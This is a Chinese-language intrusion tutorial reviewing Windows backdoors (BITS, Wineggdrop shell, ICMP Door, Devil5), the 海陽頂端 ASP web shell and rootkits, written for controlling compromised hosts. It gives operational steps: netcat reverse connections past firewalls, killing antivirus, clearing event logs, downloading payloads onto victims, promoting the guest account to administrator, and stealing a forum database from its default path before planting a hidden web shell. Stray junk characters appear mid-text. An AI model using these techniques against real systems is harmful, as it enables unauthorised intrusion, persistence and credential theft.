這是最簡單的使用,這個後門除了隱蔽性好外,還有兩大特點是非常 值得借鑒的:埠復用和正反向連接。雖然很多朋友經常聽到這兩個名詞,但並不了解它們,埠復用就是利用系統正常的TCP埠通訊和控制,比如80、139等,這樣的後門有個非常 大的好處就是非常 隱蔽,不用自己開埠也不會暴露自己的訪問,因為通訊本身就是系統的正常訪問!另一個是反向連接,這個很常 見,也是後門中一個經典思路,因為從伺服器上主動方問外邊是不被禁止的,很多很歷害的防火牆就怕這點!
BITS的正向連接很簡單,大家可以參考它的README,這種方式在伺服器沒有防火牆等措施的時候很管用,可以方便地連接,但是遇到有防火牆這樣的方式就不靈了,得使用下面的反向連接方式: 70 +g3l
在本地使用NC監聽(如:nc -l -p 1234)
用NC連接目標主機的任何一個防火牆允許的TCP埠(80/139/445……)
輸入激活命令:[email=hkfx@dancewithdolphin[rxell]:1.1.1.1:2222]hkfx@dancewithdolphin[rxell]:1.1.1.1:2222[/email] ^q/hQ , 4
目標主機的CMD將會出現NC監聽的埠2222,這樣就實現了繞過防火牆的功能了。 所謂的擴展後門,在普通意義上理解,可以看成是將非常多的功能集成到了後門里,讓後門本身就可以實現很多功能,方便直接控制肉雞或者伺服器,這類的後門非常受初學者的喜愛,通常集成了文件上傳/下載、系統用戶檢測、HTTP訪問、終端安裝、埠開放、啟動/停止服務等功能,本身就是個小的工具包,功能強大。
Wineggdroup shell j;類型:系統後門
使用范圍:win2000/xp/2003
隱蔽程度:★★★★☆
使用難度:★★☆☆☆
危害程度:★★★★☆
查殺難度:★★★★☆
這個後門是擴展後門中很有代表性的一個,功能這全面讓人嘆為觀止,它能實現如下比較有特色的功能:進程管理,可查看,殺進程(支持用進程名或PID來殺進程);注冊表管現(查看,刪除,增加等功能);服務管理(停止,啟動,枚舉,配置,刪除服務等功能)埠到程序關聯功能(fport);系統重啟,關電源,注銷等功能(reboot,poweroff,shutdown,logoff);嗅探密碼功能;安裝終端,修改終端埠功能;埠重定向功能(多線程,並且可限制連接者IP);HTTP服務功能(多線程,並且可限制連接者IP);Socd5代理功能(支持兩種不同方式驗證,可限制連接者IP);克隆賬號,檢測克隆賬戶功能(clone,checkclone);加強了的FindpassWord功能(可以得到所有登錄用戶,包括使用克隆賬戶遠程登錄用戶密碼);HTTP代理(完全匿名,支持oicq、 MSN、mirc等程序);其他輔助功能,http下載,刪除日誌,系統信息,恢復常用關聯,枚舉系統賬戶等。
當網路上剛推出這個後門的時候,非常多的人用它來替換自己原來使用的後門,一時間各處贊揚之聲迭起,但多為一些普通的打撈手的心聲,其實它和「後門」的原始定義是有出入的:一旦你需要實現越多的功能,那你的程序在執行、隱藏、穩定等方面就需要考慮非常多的問題,一個疏忽就會導致全盤皆敗,所以不建議將此後門用在需要非常隱蔽的地方。
運用舉例
在安裝後門前,需要使用它自帶的EditServer.exe程序對服務端進行非常詳細的配置,從10個具體配置中,包括了插入線程、密碼、IP登錄郵件通告等方面,不難看出它的功能是非常強大的,隱蔽性也很強,下面說幾個在入侵中常用的功能,相信經常玩入侵的朋友一定能發現它的強大之處:
Fport:列出進程到埠的列表,用於發現系統中運行程序所對應的埠,可以用來檢測常見的隱蔽的後門。
Reboot:重啟系統,如果你上傳並運行了其他後門程序,並需要重啟機器以便讓後門正常工作,那使用這個命令吧! Uz
Shell:得到一個Dos Shell,這個不多講了,直接得到伺服器或者肉雞上的cmd shell。
Pskill PID或程序名:用於殺掉特定的服務,比如殺毒軟體或者是防火牆。
Execute程序:在後台中執行程序,比如sniffer等。http://ip/文件名 保存文件名:下載程序,直接從網上down一個後門到伺服器上。
Installterm埠:在沒有安裝終端服務的win2k服務版的系統中安裝終端服務,重啟系統後才生效,並可以自定義連接埠,比如不用3389而用其他埠。
StopService/StartService:停止或者啟動某個系統服務,比如telnet。
CleanEvent:刪除系統日誌。
Redirect:TCP數據轉發,這個功能是後門程序中非常出色的一個功能,可以通過某一埠的數據轉發來控制內網的機器,在滲透入侵的時候非常管用!
EnumService:列舉所有自動啟動的服務的資料,比如後門、木馬。
RegEdit:進入注冊表操作模式,熟悉注冊表的使用者終於在後門中找到了福音! !
Findpassword:得到所有登錄用戶密碼,比我們常用的findpass功能可強多了。
總體來講,Wineggdrop shell是後門程序中很出彩的一個,它經過作者幾次大規模的修改和升級,已經趨於穩定,功能的強大當然沒得說,但是由於功能太強大,被查殺和懷疑是難以避免的,所以很多人在使用Wineggdrop shell一段時間後就發現肉雞飛了,其實是很正常的事,我你出不用氣餒,其實用很簡單的方法就可以很好地提高它的隱蔽性,下文將有說明。
相對於Wineggdrop shell來說,獨孤劍客的winshell在功能上就不那麼全面了,但是筆者推薦新手更多的使用winshell而不是Wineggdrop shell,因為winshell功能除了獲得一個shell以外,只加入了一些重啟、關閉伺服器的命令,功能相對簡單,但完全使用系統自帶的cmd來執行命令,對系統學習和掌握也是非常有幫助的!
Winshell和wolf這兩者都是國內早期頂尖的後門程序,程序的編制無疑是非常經典的,新手學習時使用這兩款後門一定能讓你明白很多系統相關東西,了解很多入侵思路和方法。 傳統的木馬程序常常使用C/S構架,這樣的構架很方便控制,也在一定程度上避免了「萬能密碼」的情況出現,對後門私有化有一定的貢獻,這方面分類比較模糊,很多後門可以歸結到此類中,比如較巧妙的就是ICMP Door了
類型:系統後門
使用范圍:win2000/xp/2003 2Z6
隱蔽程度:★★★★★
使用難度:★★★☆☆
危害程度:★★★★☆
查殺難度:★★★★★
這個後門利用ICMP通道進行通信,所以不開任何埠,只是利用系統本身的ICMP包進行控制安裝成系統服務後,開機自動運行,可以穿透很多防火牆——很明顯可以看出它的最大特點:不開任何埠~只通過ICMP控制!和上面任何一款後門程序相比,它的控制方式是很特殊的,連80埠都不用開放,不得不佩服務程序編制都在這方面獨特的思維角度和眼光!
運用舉例
這個後門其實用途最廣的地方在於突破網關後對內網計算機的控制,因為很多機密數據都是放在內網計算機上的,而控制內網計算機並不是我們想到位的商業網路進行入侵檢測,它的網路內部並不像我們常見的內網那樣非常容易入侵和控制,因為該公司本身涉及到一些網路安全的服務,所以內網個人計算機的防護是很到位的,在嘗試過很多後門後,最後ICMP Door幫我實現了成功的滲透內網!由此筆者開始愛上這個後門。
首先使用icmpsrv.exe -install參數進行後門的安裝,再使用icmpsend.exe IP進行控制,可以用:[http://xxx.xxx.xxx/admin.exe-hkfx.exe]方式下載文件,保存在[url=file://\system32]\system32[/url]目錄下,文件名為hkfx.exe,程序名前的「-」不能省去,使用[pslist]還可以列出遠程主機的進程名稱和pid,再使用[pskill id]就可以殺進程了,同樣,輸入普通cmd命令,則遠程主機也就執行了相關的命令。 ~HF1 ? %
這個後門是採用的c/s構架,必須要使用icmpsend才能激活伺服器,但是他也有自己的先天不足:後門依靠ICMP進行通訊,經過沖擊波的洗禮後,很少有伺服器還接受ICMP包了,很多都屏蔽掉了它,所以用它來控制伺服器不是一個好辦法,這也是我為什麼用它來控制內網計算機的原因了——內網很少有人屏蔽ICMP包吧? 這是ASP腳本方面流傳非常廣的一個腳本後門了,在經過幾次大的改革後,推出了「海陽頂端ASP木馬XP版」、「海陽頂端ASP木馬紅粉佳人版」等功能強大、使用方便的後門,想必經常接觸腳本安全的朋友對這些都不會陌生。類型:網頁木馬
使用范圍:支持ASP、WEB訪問
使用難度:★☆☆☆☆
危害程序:★★★☆☆
查殺難度:★★★☆☆
伺服器系統配置都相對安全,公開的系統漏洞存在的機會很少,於是腳本方面的漏洞就開始火起來。首先我們通過某種途徑獲得一個伺服器的頁面許可權(比如利用論壇上傳達室類型未嚴格設置、SQL注入後獲得ASP系統的上傳許可權、對已知物理路徑的伺服器上傳特定程序),然後我們可以通過簡單的上傳ASP程序或者是直接復制海陽項端的代碼,然後通過WEB訪問這個程序,就能很方便地查閱伺服器上的資料了,下面舉個簡單的便子(由於只是簡單的介紹,下文便子不會太難或者太普遍,希望大家理解)。
leadbbs2.77曾經風靡網路,它是個很典型的ASP論壇,屏蔽了很多可以SQL注入的寺方,但是很多傻瓜級別的網路管理員總是喜歡默認安裝,然後啟用論壇,我們只需要很簡單地在IE中輸入:WWW。***。COM/BBS/DATA/LEADBBS。MDB就能夠直接下載該論壇的資料庫了,而且沒有MD5加密哦!,我們直接找到管理員的賬戶和密碼,然後登錄論壇,到管理界面將論壇的「聯系我們」、「幫助」等ASP文件替換成我們的海陽項端代碼,然後執行GUEST許可權的CMD命令,方便的上傳/下載將定程序、遠程執行程序等,這樣一個隱藏的後門就建好了!取得伺服器的SYSTEM許可權就看大家自己的辦法了。
一般來講,海洋的功能是非常強大的,而且不容易被查殺(一個朋友採取的方式是:先利用某個腳本漏洞上傳網頁後門,再通過海洋上傳另一個後門到隱蔽的路徑,然後通過最後上傳的後門來刪除第一次上傳的海洋,這樣後門的存放路徑就可以放得非常深了,普通管理員是很難發現的),如果管理員覺得自己可能中了這里邊樣的後門,可以利用論壇備份來恢復自己的頁面系統,再配合系統日誌、論壇日誌等程序檢查系統,發現可疑ASP文件打開看看海洋是很好識別的,再刪除就可以了。
腳本方面的後門還有CGI和PHP兩面三刀大類,使用原理都差不多,這里就不再多介紹,在黑防論壇也收錄了這三種後門,大家可以下載後自己研究。 類型:系統後門
使用范圍:win200/xp/2003
隱蔽程度:★★★★☆
使用難度:★★☆☆☆
危害程序:★★★★☆
查殺難度:★★★☆☆
同BITS一樣,Devil5也是線程插入式的後門,和BITS不同的是它可以很方便的在GUI界面下按照自己的使用習慣定製埠和需要插入的線程,適合對系統有一定了解的使用都使用,由於是自定義插入線程,所以它更難被查殺,下面我們來看看它的使用。
道德使用它自帶的配置程序EDITDEVIL5.EXE對後門進行常規的配置,包括控制埠、插入線程、連接密碼、時間間隔等方面關鍵點是對插入線程的定製,一般設置成系統自帶的SVCHOST,然後運行後門就可以控制了。
我們用TELNET連接上去,連接的格式是:TELNET *** 定製的埠,它和其他後門不同之處在於連接後沒有提示的界面,每次執行程序也是分開的,必須要每次都有輸入密碼,比如我們丟掉了伺服器和管賬戶,可以激活GUEST後再將GUEST加到管理員許可權,記得每次執行命令後加上「>密碼」就可以了:net localgroup administrators guest /add >hkfx,然後你又可以控制伺服器了。
很明顯示,同榕哥的BITS相比,DEVIL5有一些缺陷:不能通過系統自帶埠通訊、執行命令比較麻煩,需要每次輸入密碼而且不回顯示輸入內容,很容易出錯。但是,它有自己的優勢:插入線程可以自已定製,比如設置IE的線程為插入的目標就比較難被查殺:自己提供了專門的查殺工具DELDEVIL5.exe,幫助防護者清理系統;而且它可以任意改名和綁定,使用靈活性上比BITS強……大家選擇哪能款就看自己的喜好了。
另外,PortLess BackDoor等工具也是此類的後門,功能強大,隱蔽性稍差,大家有興趣可以自己研究一下。 如果說上面的後門程序都各有千秋、各有所長的話,它們和經典的root kit 一比簡直就是小巫見大巫了,那究竟什麼樣是root kit呢?
root kit出現於20世紀90年代初,在1994年2月的一篇安全咨詢報告中首先使用了root kit這個名詞。從出現至今,root kit 的技術發展非常迅速,應用越來越廣泛,檢測難度也越來越大。其中釷對SunOS和Linux兩種操作系統的root kit最多。
很多人有一個誤解,他們認為root kit 是用作獲得系統root訪問許可權的工具。實際上,root kit是攻擊都用來隱蔽自己的蹤跡和保留root訪問許可權的工具。通常,攻擊者通過遠程攻擊獲得root訪問許可權,進入系統後,攻擊者會在侵入的主機中安裝root kit,然後他將經常通過root kit的後門檢查系統是否有其他的用戶登錄,如果只有自己,攻擊者就開始著手清理日誌中的有關信息。通過root kit的嗅探器獲得其他系統的用戶和密碼之後,攻擊者就會利用這些信息侵入其他系統。
從*nix系統上遷移到windows系統下的root kit完全沿襲了這些「可怕」的功能!網路上常見的root kit 是內核級後門軟體,用戶可以通過它隱藏文件、進程、系統服、系統驅動、注冊表鍵和鍵值、打開的埠以及虛構可用磁碟窨。程序同時也在內存中偽裝它所做的改動,並且隱身地控制被隱藏進程。程序安裝隱藏後門,注冊隱藏系統服務並且安裝系統驅動。該後門技術允許植入reDirector,是非常難以查殺的一個東東,讓很多網路管員非常頭疼!